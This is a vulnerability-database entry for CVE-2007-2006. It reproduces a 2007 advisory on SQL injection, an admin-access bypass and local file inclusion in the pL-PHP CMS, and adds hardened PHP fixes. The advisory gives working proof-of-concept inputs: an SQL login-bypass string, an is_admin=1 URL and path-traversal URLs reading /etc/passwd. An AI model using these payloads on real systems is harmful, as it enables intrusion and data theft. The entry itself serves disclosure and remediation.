pL-PHP 'login.php' Multiple SQL Injection Vulnerabilities

Vulnerability ID 1112670 Vulnerability type SQL injection
Published 2007-04-10 Updated 2007-04-12
CVE ID CVE-2007-2006 CNNVD ID CNNVD-200704-241
Platform PHP CVSS score 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/3704
https://www.securityfocus.com/bid/81834
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-241
|Vulnerability details
Multiple SQL injection vulnerabilities exist in login.php in pL-PHP. A remote attacker can execute arbitrary SQL commands via the (1) login or (2) pass parameter.
|Exploit (EXP)
.      .        .  
._ | _.  .|_  _. _.;_/
[_)|(_]\_|[ )(_](_.| \.net
|      ._|            
"pL-PHP beta 0.9 - MULTIPLE VULNERABILITIES"
	by Omni

1) Infos
---------
Date            : 2007-04-10
Product         : pL-PHP
Version         : beta 0.9 - Prior versions may also be affected
Vendor          : http://sourceforge.net/projects/pl-php/ - http://www.karlcore.com/programming/blog/
Vendor Status   : 2007-04-10 -> Not Informed!

Description     : pL-PHP is a new PHP Portal or Content Management System (CMS). It is based on a "multi-topics" system,
                  with sub-topics, and all the content (downloads, articles, headers, links...) is shared into these topics
                  and sub-topics. It will be very easy to use.

Source          : omnipresent - omni
E-mail          : omnipresent[at]email[dot]it - omni[at]playhack[dot]net
Team            : Playhack.net Security

2) Security Issues
-------------------
--- [ SQL Injection - Admin Access Bypass ] ---
===============================================

[login.php Source Code Bugged - Line 10 - 20]

require("includes/config.php");

// Authentication
// Script inspired by DBprotect 1.0 by David Borrat (david@borrat.net)
if (isset($_POST['login'])) {
	$login = $_POST['login'];      // taken straight from the request, no validation or escaping
	$pass = md5($_POST['pass']);   // hashed before use
	
$sql = mysql_connect($global['sql_host'], $global['sql_user'], $global['sql_pass']);
mysql_select_db($global['sql_base'], $sql);
// $login is interpolated directly into the SQL string: this is the injection point
$verif_query = sprintf("SELECT * FROM " . $global['prefix'] . "_users WHERE username='$login' AND user_password='$pass'");

[end login.php Source Code]

As we can see, the variables $login and $pass are not properly sanitized before being used, so it is possible to exploit this vulnerability remotely.

[ PoC ]
=======

Just open login.php in your browser and insert in the login field: 1' OR '1' = '1' # and in the pass field whatever you want! Now you have Admin credentials!
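A hardened form of the login check above, as an added example (not pL-PHP's own code): it assumes the same $global configuration array and <prefix>_users table, a hypothetical id column, and that user_password now stores a password_hash() value instead of an unsalted MD5 digest. The username travels to the server as a bound parameter, so the PoC string above is compared literally as a username instead of being parsed as SQL.

```php
<?php
// Added example, not pL-PHP's code: hardened replacement for the login.php
// query quoted in the advisory. Assumes the $global config array from
// includes/config.php, a <prefix>_users table with hypothetical id,
// username and user_password columns, and password_hash() digests.
require("includes/config.php");

// The table name comes from trusted configuration, never from the request.
// It cannot be bound as a statement parameter, so it is validated instead.
$table = $global['prefix'] . '_users';
if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
    die('Invalid table prefix in configuration');
}

function authenticate(mysqli $db, string $table, string $login, string $pass): ?array
{
    // Placeholder instead of interpolation: the SQL text is fixed before the
    // value arrives, so 1' OR '1' = '1' # is just an unusual username.
    $stmt = $db->prepare("SELECT id, username, user_password FROM {$table} WHERE username = ?");
    $stmt->bind_param('s', $login);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // password_verify() compares against a salted hash in constant time;
    // an unsalted MD5 as in the original is not suitable for passwords.
    if ($row === null || !password_verify($pass, $row['user_password'])) {
        return null;
    }
    unset($row['user_password']);
    return $row;
}

if (isset($_POST['login'], $_POST['pass'])) {
    $db = new mysqli($global['sql_host'], $global['sql_user'], $global['sql_pass'], $global['sql_base']);
    $db->set_charset('utf8mb4');

    $user = authenticate($db, $table, (string) $_POST['login'], (string) $_POST['pass']);
    if ($user === null) {
        // Same response for unknown user and wrong password.
        echo 'Login failed';
    } else {
        session_start();
        session_regenerate_id(true);      // new session id after privilege change
        $_SESSION['user_id'] = $user['id'];
        echo 'Welcome, ' . htmlspecialchars($user['username'], ENT_QUOTES, 'UTF-8');
    }
}
```

Storing only the user id in the session, and never an admin flag copied from the request, is what lets admin.php later decide privileges from server-side state alone.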

--- [ Global Variable Problem - Admin Access Bypass ] ---
========================================================

[admin.php Source Code Bugged - Line 14]

[...]

if($is_admin == 1)

[...]

[end admin.php Source Code]

As we can see, via the browser we can just connect to the admin.php script and pass the variable is_admin the value 1 :D.

[ PoC ]
=======

http://remote_host/[remote_path]/admin.php?is_admin=1

Now you are Admin ;)

--- [ Local File Inclusion ] ---
===============================

[admin.php Source Code Bugged - Line 16]

[...]

include("admin/lang/" . $lang . ".inc.php");

[...]

[end admin.php Source Code]

As we can see, via the browser we can just connect to the admin.php script and pass the variable $lang a path of our choosing ;).

[ PoC ]
=======

Connect with Admin credentials and... have fun..

eg 1:

http://127.0.0.1/files/admin.php?is_admin=1&lang=../../../../../../etc/passwd%00

eg 2:

First you must log in as Admin (SQL Injection method) and then...

http://127.0.0.1/files/admin.php?&lang=../../../../../../etc/passwd%00
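A hardened prologue for admin.php that addresses both the global-variable bypass and the file inclusion above, as an added example (not pL-PHP's own code). It assumes login.php stores the authenticated user's id in $_SESSION['user_id'], that <prefix>_users has hypothetical id and is_admin columns, and that the language files remain at admin/lang/<name>.inc.php as in the original; the language list itself is constructed for the example.

```php
<?php
// Added example, not pL-PHP's code: hardened start of admin.php.
// Assumptions: $_SESSION['user_id'] is set by login.php; <prefix>_users has
// hypothetical id and is_admin columns; language files are still found at
// admin/lang/<name>.inc.php.
require("includes/config.php");
session_start();

$table = $global['prefix'] . '_users';
if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
    die('Invalid table prefix in configuration');
}

// 1) Admin status is derived from the session and the database, never from
//    the request. $is_admin is always assigned below, so a ?is_admin=1
//    query parameter has no effect even when register_globals is On.
function isAdmin(mysqli $db, string $table, ?int $userId): bool
{
    if ($userId === null) {
        return false;
    }
    $stmt = $db->prepare("SELECT is_admin FROM {$table} WHERE id = ?");
    $stmt->bind_param('i', $userId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row !== null && (int) $row['is_admin'] === 1;
}

// 2) Language selection by allowlist: the request value only chooses an
//    entry from a fixed list, so no path fragment (../ or a %00 byte) can
//    reach include(). Strict in_array() rejects anything not exactly listed.
function selectLanguage(?string $requested, array $allowed, string $default): string
{
    if ($requested !== null && in_array($requested, $allowed, true)) {
        return $requested;
    }
    return $default;
}

$db = new mysqli($global['sql_host'], $global['sql_user'], $global['sql_pass'], $global['sql_base']);
$db->set_charset('utf8mb4');

$userId = isset($_SESSION['user_id']) ? (int) $_SESSION['user_id'] : null;
$is_admin = isAdmin($db, $table, $userId) ? 1 : 0;
if ($is_admin !== 1) {
    http_response_code(403);
    exit('Forbidden');
}

$languages = ['en', 'fr'];   // constructed list: use the files actually shipped in admin/lang/
$requested = isset($_GET['lang']) ? (string) $_GET['lang'] : null;
$lang = selectLanguage($requested, $languages, 'en');
include("admin/lang/" . $lang . ".inc.php");
```

With this structure the two PoC URLs above yield a 403 for an unauthenticated visitor, and for a logged-in administrator the lang value falls back to the default because it is not in the allowlist; a server-side log of 403s on admin.php is a simple place to watch for such attempts.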

3) Patches
-----------

Edit the source code to ensure that input is properly sanitized before being used.

# milw0rm.com [2007-04-10]
|Affected products
pL-PHP pL-PHP 0.9 Beta
|References

Source: MILW0RM
Name: 3704
Link: http://www.milw0rm.com/exploits/3704
Source: BUGTRAQ
Name: 20070411 pL-PHP beta 0.9 - Multiple Vulnerabilities
Link: http://www.securityfocus.com/archive/1/archive/1/465340/100/0/threaded
Source: VUPEN
Name: ADV-2007-1352
Link: http://www.frsirt.com/english/advisories/2007/1352